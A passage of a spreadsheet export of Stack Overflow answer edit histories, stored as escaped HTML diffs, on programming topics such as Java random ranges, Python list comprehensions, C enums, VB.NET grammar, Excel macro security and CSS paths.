 &lt;p&gt; You now will get a value in the range &lt;code&gt;[Min,Max)&lt;/code&gt;. Following our example, that means &lt;code&gt;[5,10)&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;5 + (Math.random() * (10 - 5))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But, this still doesn't include &lt;code&gt;Max&lt;/code&gt; and you are getting a double value. In order to get the &lt;code&gt;Max&lt;/code&gt; value included, you need to add 1 to your range parameter &lt;code&gt;(Max - Min)&lt;/code&gt; and then truncate the decimal part by casting to an int. This is accomplished via:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Min + (int)(&lt;span class="diff-add"&gt;Math&lt;/span&gt;.&lt;span class="diff-add"&gt;random&lt;/span&gt;() * ((Max - Min) + 1))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And there you have it. A random integer value in the range &lt;code&gt;[Min,Max]&lt;/code&gt;, or per the example &lt;code&gt;[5,10]&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;5 + (int)(&lt;span class="diff-add"&gt;Math&lt;/span&gt;.&lt;span class="diff-add"&gt;random&lt;/span&gt;() * ((10 - 5) + 1))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; isn't the idiomatic python equivalent to C-style ternary operators&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;cond and true_expr or false_expr_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; ie.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;list = get_list()_x000D_
return list and &lt;span class="diff-delete"&gt;None&lt;/span&gt; or &lt;span class="diff-delete"&gt;list[0]&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; isn't the idiomatic python equivalent to C-style ternary operators&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;cond and true_expr or false_expr_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; ie.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;list = get_list()_x000D_
return list and &lt;span class="diff-add"&gt;list[0]&lt;/span&gt; or &lt;span class="diff-add"&gt;None&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;List comprehension&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;You can use &lt;/span&gt;&lt;a href="https://docs.python.org/3.6/tutorial/datastructures.html#list-comprehensions" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;list comprehension&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; to extract elements that satisfy certain conditions, for example&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt; testlist &lt;span class="diff-delete"&gt;=&lt;/span&gt; [1, 2, 3, 5, 3, 1, 2, 1, 6]_x000D_
&amp;gt;&amp;gt;&amp;gt; [i for i,x in enumerate(testlist) if x == 1]&lt;span class="diff-delete"&gt; # this is 'list comprehension'&lt;/span&gt;_x000D_
[0, 5, 7]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;br&gt; _x000D_
 &lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Generator expression&lt;/span&gt;&lt;/strong&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt; Okay, you want a generator expression, we'll have a generator expression.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; First&lt;/span&gt;, &lt;span class="diff-delete"&gt;let's start with&lt;/span&gt; a &lt;code&gt;&lt;span class="diff-delete"&gt;for&lt;/span&gt;&lt;/code&gt; loop&lt;span class="diff-delete"&gt; that uses list comprehension&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt;&lt;span class="diff-delete"&gt; from __future__ import print_function # to&lt;/span&gt; &lt;span class="diff-delete"&gt;use Python 3.x-styled print() function_x000D_
&amp;gt;&amp;gt;&amp;gt;_x000D_
&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;for i in &lt;span class="diff-delete"&gt;[j&lt;/span&gt; for &lt;span class="diff-delete"&gt;j&lt;/span&gt;,x in enumerate(testlist) if x == 1]: print&lt;span class="diff-delete"&gt;(&lt;/span&gt;i&lt;span class="diff-delete"&gt;)&lt;/span&gt;_x000D_
... _x000D_
0_x000D_
5_x000D_
7_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now&lt;span class="diff-delete"&gt;, let's replace &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;[]&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; with &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;()&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; to&lt;/span&gt; construct a generator&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; (i for i,x in enumerate(testlist) if x == 1)_x000D_
&amp;lt;generator object at 0x6b508&amp;gt;_x000D_
&amp;gt;&amp;gt;&amp;gt;&lt;span class="diff-delete"&gt; # in Python 3.x&lt;/span&gt; &lt;span class="diff-delete"&gt;output would look like:_x000D_
&amp;gt;&amp;gt;&amp;gt; # &amp;lt;generator object &amp;lt;genexpr&amp;gt; at 0x10c18ae08&amp;gt;_x000D_
&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;for i in (&lt;span class="diff-delete"&gt;j&lt;/span&gt; for &lt;span class="diff-delete"&gt;j&lt;/span&gt;,x in enumerate(testlist) if x == 1): print&lt;span class="diff-delete"&gt;(&lt;/span&gt;i&lt;span class="diff-delete"&gt;)&lt;/span&gt;_x000D_
... _x000D_
0_x000D_
5_x000D_
7_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and&lt;span class="diff-delete"&gt;,&lt;/span&gt; niftily enough, we can assign that to a variable, and use it from there&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; gen = (&lt;span class="diff-delete"&gt;j&lt;/span&gt; for &lt;span class="diff-delete"&gt;j&lt;/span&gt;,x in enumerate(testlist) if x == 1)_x000D_
&amp;gt;&amp;gt;&amp;gt; for i in gen: print&lt;span class="diff-delete"&gt;(&lt;/span&gt;i&lt;span class="diff-delete"&gt;)&lt;/span&gt;_x000D_
... _x000D_
0_x000D_
5_x000D_
7_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Hmmm. There was an answer with a list comprehension here, but it's disappeared.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Here&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt; [i for i,x in&lt;/span&gt; &lt;span class="diff-add"&gt;enumerate(&lt;/span&gt;testlist&lt;span class="diff-add"&gt;)&lt;/span&gt; &lt;span class="diff-add"&gt;if x == 1]_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Example:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;testlist_x000D_
&lt;/span&gt;[1, 2, 3, 5, 3, 1, 2, 1, 6]_x000D_
&amp;gt;&amp;gt;&amp;gt; [i for i,x in enumerate(testlist) if x == 1]_x000D_
[0, 5, 7]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Update&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt; Okay, you want a generator expression, we'll have a generator expression.&lt;span class="diff-add"&gt; Here's the list comprehension again&lt;/span&gt;, &lt;span class="diff-add"&gt;in&lt;/span&gt; a &lt;span class="diff-add"&gt;for&lt;/span&gt; loop:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; for i in &lt;span class="diff-add"&gt;[i&lt;/span&gt; for &lt;span class="diff-add"&gt;i&lt;/span&gt;,x in enumerate(testlist) if x == 1]:&lt;span class="diff-add"&gt;_x000D_
...    &lt;/span&gt; print&lt;span class="diff-add"&gt; &lt;/span&gt;i_x000D_
... _x000D_
0_x000D_
5_x000D_
7_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now&lt;span class="diff-add"&gt; we'll&lt;/span&gt; construct a generator&lt;span class="diff-add"&gt;...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; (i for i,x in enumerate(testlist) if x == 1)_x000D_
&amp;lt;generator object at 0x6b508&amp;gt;_x000D_
&amp;gt;&amp;gt;&amp;gt; for i in (&lt;span class="diff-add"&gt;i&lt;/span&gt; for &lt;span class="diff-add"&gt;i&lt;/span&gt;,x in enumerate(testlist) if x == 1):&lt;span class="diff-add"&gt;_x000D_
...    &lt;/span&gt; print&lt;span class="diff-add"&gt; &lt;/span&gt;i_x000D_
... _x000D_
0_x000D_
5_x000D_
7_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and niftily enough, we can assign that to a variable, and use it from there&lt;span class="diff-add"&gt;...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; gen = (&lt;span class="diff-add"&gt;i&lt;/span&gt; for &lt;span class="diff-add"&gt;i&lt;/span&gt;,x in enumerate(testlist) if x == 1)_x000D_
&amp;gt;&amp;gt;&amp;gt; for i in gen: print&lt;span class="diff-add"&gt; &lt;/span&gt;i_x000D_
... _x000D_
0_x000D_
5_x000D_
7_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; And to think I used to write FORTRAN.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Maxim Belkin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; An &lt;code&gt;enum&lt;/code&gt; is only guaranteed to be large enough to hold &lt;code&gt;int&lt;/code&gt; values. The compiler is free to choose the actual type used based on the enumeration constants defined so it can &lt;strong&gt;&lt;span class="diff-delete"&gt;choose a smaller type&lt;/span&gt;&lt;/strong&gt; if it can represent the values you define. If you need enumeration constants that don't fit into an &lt;code&gt;int&lt;/code&gt; you will need to use compiler-specific extensions to do so&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; enum take the size of integer only i.e&lt;/span&gt;.&lt;span class="diff-delete"&gt; 4bytes in VC++ and 2 in TC/TC++(under DOS)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; An &lt;code&gt;enum&lt;/code&gt; is only guaranteed to be large enough to hold &lt;code&gt;int&lt;/code&gt; values. The compiler is free to choose the actual type used based on the enumeration constants defined so it can &lt;span class="diff-add"&gt;choose a smaller type&lt;/span&gt; if it can represent the values you define. If you need enumeration constants that don't fit into an &lt;code&gt;int&lt;/code&gt; you will need to use compiler-specific extensions to do so.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm assuming you mean &lt;a href="http://en.wikipedia.org/wiki/Visual_Basic_.NET" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;VB.NET&lt;/span&gt;&lt;/a&gt;. According to the grammar in the &lt;span class="diff-delete"&gt;Visual Basic language specification&lt;/span&gt;, which you can read &lt;span class="diff-delete"&gt;in &lt;/span&gt;&lt;em&gt;&lt;a href="http://www.microsoft.com/Downloads/thankyou.aspx?familyId=39de1dd0-f775-40bf-a191-09f5a95ef500&amp;amp;displayLang=en" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Visual Basic Language Specification 9.0&lt;/span&gt;&lt;/a&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; the&lt;/span&gt; result should be "6".&lt;/p&gt; _x000D_
 &lt;p&gt; This is because the grammar for a "line if statement" is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;If  BooleanExpression  Then  Statements  [  Else  Statements  ]  StatementTerminator_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;And&lt;/span&gt; "statements" is defined to be&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Statements  ::=_x000D_
[  Statement  ]  |_x000D_
Statements  :  [  Statement  ]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I would like to note that &lt;span class="diff-delete"&gt;debugging&lt;/span&gt; the code is not "cheating".&lt;/p&gt; _x000D_
 &lt;p&gt; I used to work on the &lt;span class="diff-delete"&gt;Visual Basic&lt;/span&gt; compiler team at Microsoft.&lt;/p&gt; _x000D_
 &lt;p&gt; There were times where the &lt;span class="diff-delete"&gt;specification&lt;/span&gt; was ambiguous, or didn't match what we had actually shipped. In several of those cases the solution (what we did to fix it) was always based on "well... what does the compiler do now".&lt;/p&gt; _x000D_
 &lt;p&gt; Sometimes we would change the compiler, sometimes we would change the &lt;span class="diff-delete"&gt;specification&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; However,&lt;span class="diff-delete"&gt; we&lt;/span&gt; would always run the compiler to see what it actually did before we made a decision.&lt;/p&gt; _x000D_
 &lt;p&gt; So... debugging the code is a big part of figuring out what it does...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm assuming you mean &lt;span class="diff-add"&gt;VB.Net&lt;/span&gt;.&lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; According to the grammar in the &lt;span class="diff-add"&gt;VB Language spec&lt;/span&gt;, which you can read &lt;span class="diff-add"&gt;here:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.microsoft.com/Downloads/thankyou.aspx?familyId=39de1dd0-f775-40bf-a191-09f5a95ef500&amp;amp;displayLang=en" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.microsoft.com/Downloads/thankyou.aspx?familyId=39de1dd0-f775-40bf-a191-09f5a95ef500&amp;amp;displayLang=en&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; The&lt;/span&gt; result should be "6".&lt;/p&gt; _x000D_
 &lt;p&gt; This is because the grammar for a "line if statement" is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;If  BooleanExpression  Then  Statements  [  Else  Statements  ]  StatementTerminator_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;and&lt;/span&gt; "statements" is defined to be&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Statements  ::=_x000D_
[  Statement  ]  |_x000D_
Statements  :  [  Statement  ]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I would like to note that &lt;span class="diff-add"&gt;debuging&lt;/span&gt; the code is not "cheating".&lt;/p&gt; _x000D_
 &lt;p&gt; I used to work on the &lt;span class="diff-add"&gt;VB&lt;/span&gt; compiler team at Microsoft.&lt;/p&gt; _x000D_
 &lt;p&gt; There were times where the &lt;span class="diff-add"&gt;spec&lt;/span&gt; was ambiguous, or didn't match what we had actually shipped. In several of those cases the solution (what we did to fix it) was always based on "well... what does the compiler do now".&lt;/p&gt; _x000D_
 &lt;p&gt; Sometimes we would change the compiler, sometimes we would change the &lt;span class="diff-add"&gt;spec&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; However,&lt;span class="diff-add"&gt;we&lt;/span&gt; would always run the compiler to see what it actually did before we made a decision.&lt;/p&gt; _x000D_
 &lt;p&gt; So... debugging the code is a big part of figuring out what it does...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;A recent rising star is &lt;/span&gt;&lt;a href="http://github.com/remkop/picocli" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;picocli&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; (ANSI colors, command line autocompletion, both annotations and programmatic API, and more).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Also check&lt;/span&gt; these out&lt;span class="diff-delete"&gt; (older)&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Check&lt;/span&gt; these out:&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Remko Popma</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt; You can check &lt;code&gt;this.constructor&lt;/code&gt;:&lt;/p&gt; &lt;p&gt; function x(y) { if (this.constructor == x) alert('called with new'); else alert('called as function'); }&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Yes, the return value is just discarded when used in the &lt;code&gt;new&lt;/code&gt; context&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Application.AutomationSecurity = msoAutomationSecurity.msoAutomationSecurityForceDisable&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Try opening the workbook after this statement. I think, this will disable macros at Application Level (not at workbook level)&lt;/p&gt; _x000D_
 &lt;p&gt; Hope that helps.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Application.AutomationSecurity = msoAutomationSecurity.msoAutomationSecurityForceDisable&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Try opening the workbook after this statement. I think, this will disable macros at Application Level (not at workbook level)&lt;/p&gt; _x000D_
 &lt;p&gt; Hope that helps.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Siddharth Rout</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This is a feature of UAC to make old applications compatible with Vista. It redirects any request to write to a system folder that the user lacks permission to a local folder.&lt;/p&gt; _x000D_
 &lt;p&gt; They are stored under "AppData\Local\VirtualStore" folder under the current user's profile. There is a group policy setting to disable this feature: "Virtualize file and registry write failures to per-user locations"&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; It's important to note that virtualization feature is enabled only for legacy processes. Legacy processes are 32-bit processes without a Vista manifest. To disable file virtualization for your application, you can edit your manifest to include a UAC behavior description:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&amp;lt;trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"&amp;gt;_x000D_
  &amp;lt;security&amp;gt;_x000D_
    &amp;lt;requestedPrivileges&amp;gt;_x000D_
      &amp;lt;requestedExecutionLevel level="asInvoker" uiAccess="false" /&amp;gt;_x000D_
    &amp;lt;/requestedPrivileges&amp;gt;_x000D_
  &amp;lt;/security&amp;gt;_x000D_
&amp;lt;/trustInfo&amp;gt; _x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Add this code snippet right before &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&amp;lt;/assembly&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; in your application manifest. The &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;level&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; attribute specifies the UAC level your application requires (&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;asInvoker&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; means your app is OK with standard user) and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;uiAccess&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; specifies whether or not you require to access user interface elements of other applications (unless you're writing a program that needs to read values of UI elements of other programs, such as a speech command application or screen reader, you're OK with &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Mark Russinovich has a great article on this: &lt;a href="http://technet.microsoft.com/en-us/magazine/cc138019.aspx" rel="nofollow noreferrer"&gt;Inside Windows Vista User Account Control&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This is a feature of UAC to make old applications compatible with Vista. It redirects any request to write to a system folder that the user lacks permission to a local folder.&lt;/p&gt; _x000D_
 &lt;p&gt; They are stored under "AppData\Local\VirtualStore" folder under the current user's profile. There is a group policy setting to disable this feature: "Virtualize file and registry write failures to per-user locations"&lt;/p&gt; _x000D_
 &lt;p&gt; Mark Russinovich has a great article on this: &lt;a href="http://technet.microsoft.com/en-us/magazine/cc138019.aspx" rel="nofollow noreferrer"&gt;Inside Windows Vista User Account Control&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>mmx</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Because &lt;code&gt;&lt;span class="diff-delete"&gt;abstract&lt;/span&gt;&lt;/code&gt; means&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Implements no functionality&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; and &lt;code&gt;&lt;span class="diff-delete"&gt;static&lt;/span&gt;&lt;/code&gt; means&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;There is functionality even if you don't have an object instance&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; And that's a logical contradiction.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Because &lt;span class="diff-add"&gt;"abstract"&lt;/span&gt; means&lt;span class="diff-add"&gt;: "Implements no functionality",&lt;/span&gt; and &lt;span class="diff-add"&gt;"static"&lt;/span&gt; means&lt;span class="diff-add"&gt;: "There is functionality even if you don't have an object instance".&lt;/span&gt; And that's a logical contradiction.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Apparently it's &lt;span class="diff-delete"&gt;a keyword&lt;/span&gt; in C++/CLI.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ts4c4dw6(VS.85).aspx" rel="nofollow noreferrer"&gt;Visual C++ Language Reference:&lt;/a&gt; "The array keyword lets you create a dynamic array that is allocated on the common language runtime heap."&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Apparently it's &lt;span class="diff-add"&gt;used&lt;/span&gt; in C++/CLI.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ts4c4dw6(VS.85).aspx" rel="nofollow noreferrer"&gt;Visual C++ Language Reference:&lt;/a&gt; "The array keyword lets you create a dynamic array that is allocated on the common language runtime heap."&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Images&lt;/span&gt; (like background-url) &lt;span class="diff-delete"&gt;in CSS are always referenced relative to the css file.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/img/a.gif_x000D_
/css/c.css_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To reference &lt;code&gt;a.gif&lt;/code&gt; from the css file, you must always reference it like such &lt;code&gt;../img/a.gif&lt;/code&gt;, irrelevant to where a page is located or how it is rewritten&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Images&lt;/span&gt;&lt;/strong&gt; (like background-url) &lt;strong&gt;&lt;span class="diff-add"&gt;in CSS are always referenced relative to the css file.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/img/a.gif_x000D_
/css/c.css_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To reference &lt;code&gt;a.gif&lt;/code&gt; from the css file, you must always reference it like such &lt;code&gt;../img/a.gif&lt;/code&gt;, irrelevant to where a page is located or how it is rewritten&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;.........................................................................................................................................&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;require 'pathname'_x000D_
_x000D_
